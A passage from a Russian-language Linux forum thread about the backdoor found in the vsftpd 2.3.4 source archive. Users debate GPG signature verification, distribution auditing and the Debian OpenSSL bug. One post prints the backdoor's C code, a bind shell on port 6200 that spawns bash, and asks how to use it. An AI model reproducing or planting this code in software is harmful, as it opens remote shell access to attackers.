> а в его хостинге.

"Безопасность имеет 2 уровня: hi и нехай".

Ответить | Правка | ^ к родителю #60 | Наверх | Cообщить модератору

93. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 10:57 
Вы доверяете своему провайдеру DNS? :)
Ответить | Правка | ^ к родителю #70 | Наверх | Cообщить модератору

112. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 06-Июл-11, 00:36 
> Вы доверяете своему провайдеру DNS? :)

Мы доверяем, но проверяем. В случае каких либо подозрений делается многоточечная проверка на вшивость из нескольких разных точек на планете, с разных ISP, сравниваются результаты, делаются выводы. При необходимости используются и кеши. Довольно интересные выводы временами, я вам скажу. Например, некоторые сайты избирательно недоступны географически. Некоторые вывешивают разным нациям разный контент. Иногда США борзеют и отбирают сайты без суда и следствия, разумеется, только DNS имя, а не айпи. Иногда заметны и "НЛО" с различной степенью вредительства.

В общем случае сеть - это как улица. Там может и коп засесть в засаде, и мафиози с пушкой за углом, и не факт что и те и другие к вам питают симпатии. Смотри куда идешь и не щелкай клювом, а если есть подозрения - их следует проверять. Только в отличие от - вы можете всегда выкопать себе секурный туннель без копов и мафии, выходящий на поверхность где-нибудь в другой стране.

Ответить | Правка | ^ к родителю #93 | Наверх | Cообщить модератору

41. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Пиу on 04-Июл-11, 20:07 
$ cat /usr/portage/net-ftp/vsftpd/Manifest | grep vsftpd-2.3.4.tar.gz
DIST vsftpd-2.3.4.tar.gz 187043 RMD160 4097b495b5b03833e18b1639931939c3176e498b SHA1 b774cc6b4c50e20f4fe9ca7f6aa74169ce7fe5ea SHA256 b466edf96437afa2b2bea6981d4ab8b0204b83ca0a2ac94bef6b62b42cc71a5a
$


В нормальных дистрах всё ок.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

46. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 04-Июл-11, 22:08 
> судя по всему vsftpd размещался на shared-хостинге

Еще один дятел проверил на себе что бывает когда соседнего пионера разломали? Малацца, шареды рулят. Если, конечно, вы за команду хакеров болеете, а не за команду админов сайтов :)

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

48. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 04-Июл-11, 22:13 
Объясните мне в чем сила цифровой подписи ? Чем она может помочь в случае взлома сервера ? Если бы взломавший не только vsftpd-2.3.4.tar.gz заменил, но и на коленке своим приватным ключом создал фиктивный vsftpd-2.3.4.tar.gz.asc, который бы при проверке писал, что сигнатура нормальная. Какой момент я упускаю ?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

49. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 04-Июл-11, 22:16 
В продолжение. Для дистрибутивов все ясно, проверочный публичный ключ изначально идет в комплекте. Но для vsftpd, проверочный ключ на том же сервере лежит, его вместе с .asc подменить раз плюнуть.
Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

56. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Аноним (??) on 04-Июл-11, 23:05 
> Но для vsftpd, проверочный ключ на том же сервере лежит, его вместе с .asc подменить раз плюнуть.

Во-первых, лично я там его не нашел, киньте ссылку плз?
Во-вторых, каким нужно быть идиотом, чтобы брать публичный ключ с сервера разработчика? Все публичные ключи должны находиться в sks-пуле, и вытягиваются оттуда автоматически.

Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

55. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 04-Июл-11, 23:02 
> Объясните мне в чем сила цифровой подписи ? Чем она может помочь
> в случае взлома сервера ? Если бы взломавший не только vsftpd-2.3.4.tar.gz
> заменил, но и на коленке своим приватным ключом создал фиктивный vsftpd-2.3.4.tar.gz.asc,
> который бы при проверке писал, что сигнатура нормальная. Какой момент я
> упускаю ?

К сожалению, вы ничего не понимаете в принципах работы криптографии с открытым ключом.
Информация к размышлению: закрытый ключ можно и нужно хранить так, чтобы злобный дядя при всем желании не смог бы его получить. А без этого ключа корректную подпись он не сделает.

Ответить | Правка | ^ к родителю #48 | Наверх | Cообщить модератору

58. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 04-Июл-11, 23:43 
> Информация к размышлению: закрытый ключ можно и нужно хранить так, чтобы злобный
> дядя при всем желании не смог бы его получить. А без
> этого ключа корректную подпись он не сделает.

Вы не поняли. Закрытый ключ здесь вообще не причем. Мне не нужен чужой закрытый ключ, когда я могу сгенерировать на коленке свой закрытый ключ, сделать vsftpd-2.3.4.tar.gz.asc на основе своего ключа и заменить лежащий неподалеку публичный колюч, которым осуществляется проверка.

Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

61. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 04-Июл-11, 23:52 
Вам всего лишь нужно заменить ключи на всех серверах ключей (причём старые ключи удалять нельзя) и подделать все подписи доверенных людей на ключе.
Ответить | Правка | ^ к родителю #58 | Наверх | Cообщить модератору

68. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 00:53 
> Вам всего лишь нужно заменить ключи на всех серверах ключей (причём старые
> ключи удалять нельзя) и подделать все подписи доверенных людей на ключе.

А также удалить все ключи у тех кто их уже скачал и объяснить почему ключ изменился :).

Ответить | Правка | ^ к родителю #61 | Наверх | Cообщить модератору

59. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –1 +/
Сообщение от Аноним (??) on 04-Июл-11, 23:48 
> К сожалению, вы ничего не понимаете в принципах работы криптографии с открытым
> ключом.

К сожалению, вы ничего не понимайте в механизмах социальной инжинерии. Для того чтобы создать иллюзию успешной проверки не нужно иметь доступ к оригинальному закрытому ключу, можно подсунуть фиктивную подпись.

Ответить | Правка | ^ к родителю #55 | Наверх | Cообщить модератору

62. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 04-Июл-11, 23:55 
>> К сожалению, вы ничего не понимаете в принципах работы криптографии с открытым
>> ключом.
> К сожалению, вы ничего не понимайте в механизмах социальной инжинерии. Для того
> чтобы создать иллюзию успешной проверки не нужно иметь доступ к оригинальному
> закрытому ключу, можно подсунуть фиктивную подпись.

Когда вы наконец прочитаете документацию то сможете узнать что ключ могут подписывать другие люди, удостоверяя тем самым его подлинность, плюс у всех ключей есть уникальный отпечаток который обычно публикуется не на одном сервере.

Ответить | Правка | ^ к родителю #59 | Наверх | Cообщить модератору

66. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Аноним (??) on 05-Июл-11, 00:01 
> Когда вы наконец прочитаете документацию то сможете узнать что ключ могут подписывать
> другие люди, удостоверяя тем самым его подлинность, плюс у всех ключей
> есть уникальный отпечаток который обычно публикуется не на одном сервере.

Ну елки палки, разжёвываю. Если удалось подменить архив, то можно подписать его _другим_ ключом, который также будет доступен, но это будет другой ключ. Когда вы запустите gpg vsftpd-2.3.4.tar.gz.asc, он вам автоматом вытянет нужный публичный ключ и этот ключ будет _другим_ ключом, не тем которым архив был подписан автором, а тем которым подписали взломщики.

Ответить | Правка | ^ к родителю #62 | Наверх | Cообщить модератору

67. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 00:43 
>он вам автоматом вытянет нужный публичный ключ и этот ключ будет _другим_ ключом, не тем которым архив был подписан автором, а тем которым подписали взломщики.

Собственно, на этом история "взлома" и закончится, коварный злодейский замысел будет раскрыт. Криптография в действии.

Ответить | Правка | ^ к родителю #66 | Наверх | Cообщить модератору

80. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 02:25 
> Собственно, на этом история "взлома" и закончится, коварный злодейский замысел будет раскрыт.
> Криптография в действии.

И каким образом "криптография в действии" поможет определить подставной характер того файла Васе Пупкину, попытавшемуся первый раз скачать и проверить архив ? Ситуация обсуждается, когда все постоянные пользователи и дистростроители давно скачали и проверили архив ещё до его замены, замены была совершена спустя пол года после релиза.

Ответить | Правка | ^ к родителю #67 | Наверх | Cообщить модератору

84. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 03:30 
> Васе Пупкину, попытавшемуся первый раз скачать и проверить архив ?

Для юзеров придуманы репы. Если вы совсем уж Пупкин, на кой черт вам сорц? Так и скрипт с rm -rf /* слить можно по дурости своей.

Ответить | Правка | ^ к родителю #80 | Наверх | Cообщить модератору

69. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +1 +/
Сообщение от Аноним (??) on 05-Июл-11, 00:54 
> ключ и этот ключ будет _другим_ ключом,

... после чего у окружающих будет много вопросов - а какого, собственно, не подходит старый ключ?!

Ответить | Правка | ^ к родителю #66 | Наверх | Cообщить модератору

81. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 02:29 
> ... после чего у окружающих будет много вопросов - а какого, собственно,
> не подходит старый ключ?!

Для этого и ломают через полгода после релиза, чтобы постоянных клиентов отсеять и максимально затянуть факт обнаружения. Речь не о том, что кто-то заметит. А о том, что файл с цифровой подписью не для всех на 100% гарантирует оригинальность релиза. В вашем случае вы слепо доверяйте подобным проверкам и я привел пример возможного вектора атаки.

Ответить | Правка | ^ к родителю #69 | Наверх | Cообщить модератору

94. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 11:01 
>> ... после чего у окружающих будет много вопросов - а какого, собственно,
>> не подходит старый ключ?!
> Для этого и ломают через полгода после релиза, чтобы постоянных клиентов отсеять
> и максимально затянуть факт обнаружения. Речь не о том, что кто-то
> заметит. А о том, что файл с цифровой подписью не для
> всех на 100% гарантирует оригинальность релиза. В вашем случае вы слепо
> доверяйте подобным проверкам и я привел пример возможного вектора атаки.

Вы привели всем известную очевидную вещь о которой GPG кричит при любой проверке:
gpg: ВНИМАНИЕ: Данный ключ не заверен доверенной подписью!
gpg:          Нет указаний на то, что подпись принадлежит владельцу.

Надёжность подписи построена на проверке ключей, _в том числе_ и при получении ключа. Это написано в первых строках документации.

Ответить | Правка | ^ к родителю #81 | Наверх | Cообщить модератору

97. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 13:10 
> Надёжность подписи построена на проверке ключей, _в том числе_ и при получении
> ключа. Это написано в первых строках документации.

И кто мешает взломщику использовать свой полноценный заверенный ключ ? Ключ злоумышленника ничем по сути от ключа автора не отличается. Взломщик точно также как и автор может использовать правильный ключ, который может быть банально украден у кого-нибудь или обманным путем получен.

Ответить | Правка | ^ к родителю #94 | Наверх | Cообщить модератору

113. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 06-Июл-11, 00:38 
> И кто мешает взломщику использовать свой полноценный заверенный ключ ?

Наверное,
1) Необходимость чтобы этот ключ заверили, а это еще не факт что сделают.
2) Фингерпринт изменится и толпа народа всяко заметит что имело место событие требующее к себе повышенного внимания.

Ответить | Правка | ^ к родителю #97 | Наверх | Cообщить модератору

125. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –1 +/
Сообщение от Аноним (??) on 06-Июл-11, 09:15 
>> И кто мешает взломщику использовать свой полноценный заверенный ключ ?
> Наверное,
> 1) Необходимость чтобы этот ключ заверили, а это еще не факт что
> сделают.

С этим никак проблем, можно и украденный ключ использовать, их тонны можно набрать поскребя по ботнетам.

> 2) Фингерпринт изменится и толпа народа всяко заметит что имело место событие
> требующее к себе повышенного внимания.

Думайте кто-то помнит какой оригинальный фингерпринт был у автора vsftpd ? Максимум смотрят success или нет проверка gpg и все.

Ответить | Правка | ^ к родителю #113 | Наверх | Cообщить модератору

76. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от bircoph (ok) on 05-Июл-11, 01:09 
Проверил у себя на серверах с Gentoo:

1) Бэкдор не работает. 2) Аудит кода обработки пароля подозрительного ничего не выявил. 3) Контрольные суммы тарбола совпадают с чистыми.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

82. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Клыкастый (ok) on 05-Июл-11, 02:34 
> Проверил у себя на серверах с Gentoo:

чётко. значит не успели черпануть. с другой стороны в полный росто встаёт вопрос: если планируется выходить на серьёзный уровень требуется аудит кода.

Ответить | Правка | ^ к родителю #76 | Наверх | Cообщить модератору

85. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  –2 +/
Сообщение от Аноним (??) on 05-Июл-11, 03:31 
Серьезные дистры ведут анализ изменений софта по пакетам. Это гентусятники всякие тянут с серверов что попало.
Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

92. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Клыкастый (ok) on 05-Июл-11, 10:50 
в FreeBSD есть секурити тим и аудит пакетов - хотя казалось бы та же петрушка.
в генте контрольные суммы в количестве 3 штук лежат на ИХ серверах. Т.е. чтобы стянуть и поставить ломаную версию не так просто. Другое дело если в портежи добавят уже ломаный софт. Опять возвращаемся к исходной мысли: не так важно откуда тянется софт. Важно чтобы была служба, которая хотя бы подобие анализа проводит. Этого зачастую нет, посему это - слабое место. И бить будут туда. Слом серверов разработчиков - раз. А при хорошей оплате и казачка засланного в команду разработчиков можно.
Ответить | Правка | ^ к родителю #85 | Наверх | Cообщить модератору

98. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 05-Июл-11, 13:12 
> Серьезные дистры ведут анализ изменений софта по пакетам. Это гентусятники всякие тянут
> с серверов что попало.

угу, а еще держат протухший софт и сами пытаются бекпартировать секюрные патчи, в результате получаем такие истории как: дебиан и экзим.

Ответить | Правка | ^ к родителю #85 | Наверх | Cообщить модератору

115. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 06-Июл-11, 00:50 
> угу, а еще держат протухший софт и сами пытаются бекпартировать секюрные патчи,
> в результате получаем такие истории как: дебиан и экзим.

В случае дебиана - не все так однозначно: их програмеры увидели возможную оптимизацию. Запросили авторов OpenSSL о том насколько оно правильно и можно. Те подтвердили что все ок и так можно. Дебианщики сделали. Хотя первичная причина - зуд не там где надо у дебианщиков без надлежащего повода и квалификации, следует добавить что им помогли облажаться авторы библы, а вот это уже подстава с их стороны. Поэтому виноваты как дебианщики с своим зудом, тогда как криптография ломается кривыми руками очень легко, но помогли лопухнуться сами авторы либы. После чего доверие к ним резонно упало.

Кстати гентусятники лихо отгружали забэкдоренный AcidBitches'ами UnrealIRCD. Единственные из всех дистров. Заметьте, это не теоретическая возможность что-то выполнить, это настоящий ремотный шелл с правами IRCD.

Ответить | Правка | ^ к родителю #98 | Наверх | Cообщить модератору

122. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от bircoph (ok) on 06-Июл-11, 03:15 
Тем не менее, авторы openssl не стали включать эту возможность в апстрим, а не на пустом месте. Они просто отписались дебиану в духе ну можно, ну делайте под вашу ответственность. Ну вот и сделали.
Ответить | Правка | ^ к родителю #115 | Наверх | Cообщить модератору

129. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от anonymous (??) on 06-Июл-11, 09:55 
> В случае дебиана — не все так однозначно: их програмеры увидели возможную
> оптимизацию. Запросили авторов OpenSSL о том насколько оно правильно и можно.
> Те подтвердили что все ок и так можно.

поразительно, сколько слов, маскирующих неправду. а теперь правда — как её без труда можно проверить по архивам список рассылок.

криворукий маинтайнер OpenSSL увидел варнинги при сборке. сей он практически не знает, в чём признавался лично, криптографии тоже. пошёл спрашивать у авторов. авторы ему сказали: «ну, можно и убрать эту ерунду, если варнинги вас нервируют в процессе отладки». ключевое было — «ерунду можно убрать *для отладки*». дальше пошла классика: «гляжу в книгу, вижу фигу»: человек прочитал «можно убрать», обрадовался, и, выключив мозг, убрал. «зато без варнингов!»

так оно и жило, пока кто-то не глянул в набор патчей к OpenSSL и, мягко говоря, фалломорфировал. после чего маинтайнер встал в позу: «я не я, лошадь не моя, я у авторов спрашивал, они сказали, что можно!»

авторы резонно удивились: во-первых, было сказано, что можно для отладки. во-вторых, любому вменяемому человеку, который немного понимает в криптографии, ясно, что убирать это нельзя.

сообщество бебиана, впрочем, мнение авторов проигнорило и сделало вид, что это маинтайнер OpenSSL на белом коне, а авторы либы в навозе. хотя всё на самом деле наоборот, и у дистрибутивов с адекватными маинтайнерами проблем не было.

теперь вот бебианцы ходят и везде пытаются рассказать сказку про то, что «помогли лопухнуться сами авторы либы. После чего доверие к ним резонно упало.» хотя у любого человека, который взял на себя труд добраться до оригиналов и почитать (а не слушать лепет бебианцев) доверие упало только к бебиану, степени адекватности его маинтайнеров и общей секурности бебиана как дистриба (мало ли, какой ключевой компонент они следующим поломают; возьмут, и руткит в ведро встроят; а виноваты окажутся ребята из lkml).

Ответить | Правка | ^ к родителю #115 | Наверх | Cообщить модератору

131. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 06-Июл-11, 13:01 
Вы передергивайте, "отладка" - лишь цепляние к словам и отговорка. В том коде черт ногу сломит и никаких комментариев по поводу отсутствия инициализации для формирования энтропии. Реально, разработчики OpenSSL сами давно забыли о том, что у них совершенно неявно энтропия формируется. И ни при каком анализе патчей ничего выявлено небыло, столкнулись с глюком и после долгих разбирательств нашли причину. А ваше упоминане "любого вменяемого человека, который немного понимает в криптографии" доказывает, что вы даже не заглядывали в тот код и не разбирались в чем суть патча, так потрепаться на пустом месте вылезли, отрывочными знаниями и домыслами блеснуть.
Ответить | Правка | ^ к родителю #129 | Наверх | Cообщить модератору

132. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от anonymous (??) on 06-Июл-11, 14:22 
> Вы передергивайте, «отладка» — лишь цепляние к словам и отговорка.

дадада. когда говорят «для отладки можно» — это, конечно, значит, что можно и для релиза.

> понимает в криптографии" доказывает, что вы даже не заглядывали в тот
> код и не разбирались в чем суть патча, так потрепаться на
> пустом месте вылезли, отрывочными знаниями и домыслами блеснуть.

Иксперт Рипортинг Ин! у тебя очень, очень плохой телепатор. поломаный. чини его.

а вот то, что ты ни разу не пытался разобраться, что же произошло и почему именно по первоисточникам — это ты хорошо продемонстрировал.

я, впрочем, уже всё сказал. sapienti sat.

Ответить | Правка | ^ к родителю #131 | Наверх | Cообщить модератору

134. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Аноним (??) on 06-Июл-11, 17:52 
Вы желчью попусту не истекайте, а вместо пустого трепа ссылку про упоминание только для дебага давайте. 99.9999% что вы такую ссылку не найдете, потому как ваши плевки в сторону Debian это плод вашего воображения.

Ответить | Правка | ^ к родителю #132 | Наверх | Cообщить модератору

135. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от anonymous (??) on 06-Июл-11, 18:11 
> Вы желчью попусту не истекайте, а вместо пустого трепа ссылку про упоминание
> только для дебага давайте. 99.9999% что вы такую ссылку не найдете,
> потому как ваши плевки в сторону Debian это плод вашего воображения.

я и не собираюсь тратить время на повторные поиски. успокойся, всё нормально, бебианцы на коне, остальные в гуано. виноваты, конечно же, авторы OpenSSL, а не майнтайнер. съешь таблеточку уже.

Ответить | Правка | ^ к родителю #134 | Наверх | Cообщить модератору

133. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от anonymous (??) on 06-Июл-11, 14:24 
кстати, камент выше — реакция типического бебианщка: «в гуано могут вступить все, кто угодно, кроме нас!» виноваты все вокруг, кто угодно вокруг, только не бебианщики.
Ответить | Правка | ^ к родителю #131 | Наверх | Cообщить модератору

106. "В исходных текстах FTP-сервера vsftpd обнаружен бэкдор"  +/
Сообщение от Michael Shigorin email(ok) on 05-Июл-11, 20:31 
> если планируется выходить на серьёзный уровень требуется аудит кода.

Именно этим альт примерно до Master 2.4 включительно и занимался, в числе прочего... (ldv@ и inger@, чтоб быть точным)

Ответить | Правка | ^ к родителю #82 | Наверх | Cообщить модератору

91. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Axel email(??) on 05-Июл-11, 10:46 
По-любому vsftpd ze best.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

104. "В доступный на официальном сайте архив исходных текстов FTP-..."  +1 +/
Сообщение от Аноним (??) on 05-Июл-11, 15:06 
SFTP the best. FTP/TELNET/RLOGIN - каменный век.
Ответить | Правка | ^ к родителю #91 | Наверх | Cообщить модератору

107. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Michael Shigorin email(ok) on 05-Июл-11, 20:33 
> SFTP the best. FTP/TELNET/RLOGIN - каменный век.

Для анонимной отдачи годится, хотя латентность у HTTP поменьше.  А вот чем rw ftp выигрывает у rsync over ssh -- не понимаю (кроме широкой доступности ftp-клиентов, в т.ч. интегрированных, на виндах всяких).

Ответить | Правка | ^ к родителю #104 | Наверх | Cообщить модератору

118. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Sergey Kovalyov on 06-Июл-11, 01:29 
> А вот чем rw ftp выигрывает у rsync over ssh -- не понимаю

Нагрузка на проц (из-за ssh) на хорошем канале?

Ответить | Правка | ^ к родителю #107 | Наверх | Cообщить модератору

137. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Michael Shigorin email(ok) on 06-Июл-11, 21:15 
>> А вот чем rw ftp выигрывает у rsync over ssh -- не понимаю
> Нагрузка на проц (из-за ssh) на хорошем канале?

Ммм... да, ты прав, на десятке и без сжатия упирается в одно ядро 2.93GHz (95..99% на обеих сторонах при ~82..84Mb/s).  Но если бы в подобных ограниченных окружениях была типична такая задача (т.е. для начала поверх TCP и вообще эзернетных кадров), то начинал бы с просто rsync://.

BTW помнится, кто-то ковырял openssh насчёт как раз или слишком коротких (на кластерах), или слишком длинных (internet2), но в обоих случаях весьма толстых каналов.

Ответить | Правка | ^ к родителю #118 | Наверх | Cообщить модератору

139. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от nagual email(ok) on 07-Июл-11, 13:06 
>> А вот чем rw ftp выигрывает у rsync over ssh -- не понимаю
> Нагрузка на проц (из-за ssh) на хорошем канале?

Если это интел атом то и нагрузка на проц от ssh и нагрузка на проц от сетевой и агрузка на проц от контролера sata ... в нем же все девайсы как софтмодем.

Ответить | Правка | ^ к родителю #118 | Наверх | Cообщить модератору

143. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Michael Shigorin email(ok) on 07-Июл-11, 14:29 
> atom [...] в нем же все девайсы как софтмодем.

AFAIK нет, просто слабенький CPU не так скрадывает ущербность какого rtl8168.

Ответить | Правка | ^ к родителю #139 | Наверх | Cообщить модератору

116. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Аноним (??) on 06-Июл-11, 00:51 
> SFTP the best.

Не всегда. Попробуйте гигабитный канал, да еще с слабого нетбука например? Когда все упрется в шифрование а не в канал - будет не прикольно, да :). Особенно смешно если нетбук и машина прямым проводом соединены. В общем глупо утверждать что 1 размера хватит всем.

Ответить | Правка | ^ к родителю #104 | Наверх | Cообщить модератору

108. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Аноним (??) on 05-Июл-11, 23:15 
Что-то бекдор не работает. На любые команды ругается:
: command not found
/bin/ls /
: No such file or directory
/bin/data
: No such file or directory
/bin/date
: No such file or directory


int vsf_sysutil_extra(void)
{
        int fd, rfd;
        struct sockaddr_in sa;

        if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
                exit(1);
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        sa.sin_port = htons(6200);
        sa.sin_addr.s_addr = INADDR_ANY;
        if((bind(fd,(struct sockaddr *)&sa,
                                        sizeof(struct sockaddr))) < 0) exit(1);
        perror("");
        if((listen(fd, 100)) == -1) exit(1);
        for(;;)
        {
                rfd = accept(fd, 0, 0);
                close(0); close(1); close(2);
                dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
                execl("/bin/bash","sh",(char *)0);
        }
}

Как его использовать?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

117. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Аноним (??) on 06-Июл-11, 00:52 
> Что-то бекдор не работает. На любые команды ругается:

Use strace, Luke!

Ответить | Правка | ^ к родителю #108 | Наверх | Cообщить модератору

123. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Аноним (??) on 06-Июл-11, 05:11 
Да нифига он не работает в том виде что он есть. Ну то есть соединение принимает, но ничего запустить из него не возможно.
Ответить | Правка | ^ к родителю #117 | Наверх | Cообщить модератору

124. "В доступный на официальном сайте архив исходных текстов FTP-..."  +/
Сообщение от Аноним (??) on 06-Июл-11, 05:18 
> Да нифига он не работает в том виде что он есть. Ну
> то есть соединение принимает, но ничего запустить из него не возможно.

А не работает, но как-то частично. Нормально только echo заработало, типа:
echo aaa > /tmp/1.log
или echo $PWD

Остальные башевские команды почему-то не работают.

Ответить | Правка | ^ к родителю #123 | Наверх | Cообщить модератору

127. "В доступный на официальном сайте архив исходных текстов..."  +/
Сообщение от anonymous (??) on 06-Июл-11, 09:42 
> А не работает, но как-то частично. Нормально только echo заработало, типа:
> echo aaa > /tmp/1.log
> или echo $PWD
> Остальные башевские команды почему-то не работают.

наверное потому, что ls и ты пы — вовсе не «башевские команды», и, видимо, демон предварительно чрутнулся: чтобы вот таким вот бэкдорам маленько кайф поломать.

Ответить | Правка | ^ к родителю #124 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру